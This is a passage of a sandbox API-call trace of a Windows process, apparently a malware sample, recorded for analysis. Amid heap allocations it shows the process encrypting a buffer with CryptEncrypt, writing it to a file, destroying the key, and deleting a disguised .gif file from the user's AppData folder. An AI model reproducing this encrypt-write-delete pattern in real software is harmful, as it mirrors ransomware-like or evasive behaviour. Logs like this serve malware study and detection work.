hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0122.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa258 | out: hHeap=0x2af0000) returned 1 [0122.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0122.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0122.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73f20 | out: hHeap=0x2af0000) returned 1 [0122.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0122.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0122.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0122.328] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0122.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0122.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0122.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0122.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0122.329] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0122.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0122.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0122.329] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0122.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0122.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa348 | out: hHeap=0x2af0000) returned 1 [0122.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0122.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0122.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0122.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0122.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0122.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0122.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0122.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0122.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0122.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0122.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0122.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0122.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0122.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0122.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0122.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0122.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0122.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0122.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0122.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0122.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0122.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0122.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0122.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0122.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0122.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0122.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0122.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0122.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0122.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0122.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0122.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0122.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0122.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0122.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0122.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0122.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0122.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0122.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0122.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0122.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0122.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0122.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2ac25b0 | out: hHeap=0x2af0000) returned 1 [0122.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0122.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0122.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0122.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0122.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0122.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0122.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0122.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0122.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0122.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0122.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0122.331] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0122.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0122.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0122.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0122.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0122.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0122.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0122.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0122.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0122.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0122.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0122.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0122.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0122.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0122.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa2e8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0122.332] CryptEncrypt (in: hKey=0x9a4880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x98c4, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x98c8) returned 1 [0122.332] CharLowerBuffW (in: lpsz="byte[39112]", cchLength=0xb | out: lpsz="byte[39112]") returned 0xb [0122.334] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.334] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.334] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaa528, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0122.335] CryptEncrypt (in: hKey=0x9a4880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2ac25b0*, pdwDataLen=0x8cef60*=0x98c4, dwBufLen=0x98c8 | out: pbData=0x2ac25b0*, pdwDataLen=0x8cef60*=0x98c8) returned 1 [0122.336] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0122.336] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0122.336] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0122.336] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0122.336] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0122.336] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0122.341] WriteFile (in: hFile=0x4f0, lpBuffer=0x2a9a140*, nNumberOfBytesToWrite=0x98c8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a9a140*, lpNumberOfBytesWritten=0x8cf5e4*=0x98c8, lpOverlapped=0x0) returned 1 [0122.343] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0122.343] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0122.343] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.343] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.343] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0122.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa3a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0122.343] CryptDestroyKey (hKey=0x9a4880) returned 1 [0122.343] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0122.343] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0122.343] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0122.343] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0122.343] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0122.343] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0122.344] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0122.344] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0122.344] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0122.344] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0122.344] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0122.344] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0122.344] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.344] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.344] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0122.344] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0122.356] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0122.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0122.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6f00, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0122.359] CryptReleaseContext (hProv=0x9beb38, dwFlags=0x0) returned 1 [0122.359] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0122.359] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0122.359] FreeLibrary (hLibModule=0x76390000) returned 1 [0122.359] CloseHandle (hObject=0x4f4) returned 1 [0122.361] CloseHandle (hObject=0x4f0) returned 1 [0122.363] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0122.364] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0122.364] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/DZjNZY.gif", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\DZjNZY.gif", lpFilePart=0x8cedf4*="DZjNZY.gif") returned 0x2a [0122.364] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\DZjNZY.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\dzjnzy.gif")) returned 0x20 [0122.364] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\DZjNZY.gif", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2b359c0, ftCreationTime.dwHighDateTime=0x1d5d400, ftLastAccessTime.dwLowDateTime=0x36e47fd0, ftLastAccessTime.dwHighDateTime=0x1d5cefd, ftLastWriteTime.dwLowDateTime=0x36e47fd0, ftLastWriteTime.dwHighDateTime=0x1d5cefd, nFileSizeHigh=0x0, nFileSizeLow=0x98c4, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="DZjNZY.gif", cAlternateFileName="")) returned 0x9a43c0 [0122.364] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\DZjNZY.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\dzjnzy.gif")) returned 1 [0122.365] FindNextFileW (in: hFindFile=0x9a43c0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc2b359c0, ftCreationTime.dwHighDateTime=0x1d5d400, ftLastAccessTime.dwLowDateTime=0x36e47fd0, ftLastAccessTime.dwHighDateTime=0x1d5cefd, ftLastWriteTime.dwLowDateTime=0x36e47fd0, ftLastWriteTime.dwHighDateTime=0x1d5cefd, nFileSizeHigh=0x0, nFileSizeLow=0x98c4, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="DZjNZY.gif", cAlternateFileName="")) returned 0 [0122.365] FindClose (in: hFindFile=0x9a43c0 | out: hFindFile=0x9a43c0) returned 1 [0122.365] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0122.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0122.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0122.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0122.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0122.366] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0122.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0122.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0122.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0122.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0122.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0122.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0122.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0122.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0122.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0122.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0122.366] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0122.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0122.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0122.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9310 [0122.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0122.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0122.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9328 [0122.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0122.366] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0122.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0122.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0122.366] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0122.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0122.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0122.366] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0122.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0122.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0122.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0122.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0122.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0122.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0122.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0122.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0122.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0122.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0122.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0122.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0122.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0122.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0122.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0122.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0122.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0122.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0122.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0122.367] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0122.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0122.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0122.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0122.367] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0122.367] 